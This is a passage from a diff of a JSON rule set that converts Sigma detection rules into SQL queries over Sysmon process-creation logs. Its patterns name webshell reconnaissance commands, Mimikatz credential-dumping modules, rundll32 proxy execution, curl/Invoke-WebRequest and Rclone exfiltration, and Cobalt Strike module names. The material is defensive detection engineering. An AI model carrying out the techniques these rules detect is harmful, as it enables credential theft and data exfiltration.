"medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Remote Utilities' AND NOT ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_renamed_rurat.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", + "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "description": "Detects powershell scripts that import modules from suspicious directories", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' 
OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module 
''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_detection.yml" + "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" }, { - "title": "HackTool - GMER Rootkit Detector and Remover Execution", - "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "status": "experimental", - "description": "Detects the execution GMER tool based on image and hash fields.", + "title": "PowerShell Get-Clipboard Cmdlet Via CLI", + "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "status": "test", + "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1115" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" + "SELECT * FROM logs WHERE (EventID = 
'1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_gmer.yml" + "filename": "proc_creation_win_powershell_get_clipboard.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", - "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "status": "test", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1053.002" ], "falsepositives": [ - "Unknown" + "Unlikely (at.exe deprecated as of Windows 8)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE 
'%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_at_interactive_execution.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", - "status": "test", - "description": "Detects usage of 
\"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", + "status": "experimental", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Potential System Information Discovery Via Wmic.EXE", + "id": "9d5a1274-922a-49d0-87f3-8c653483b909", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects the use 
of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", + "author": "TropChaud", "tags": [ "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.t1082" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR 
CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unlikely" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' 
ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", - "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - GMER Rootkit Detector and Remover Execution", + "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "status": "experimental", + "description": "Detects the execution GMER tool based on image and hash fields.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" - }, - { - "title": "Suspicious Rundll32 Activity", - "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE 
'%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE 
'%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" ], - "filename": "proc_creation_win_rundll32_susp_activity.yml" + "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND 
(CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' 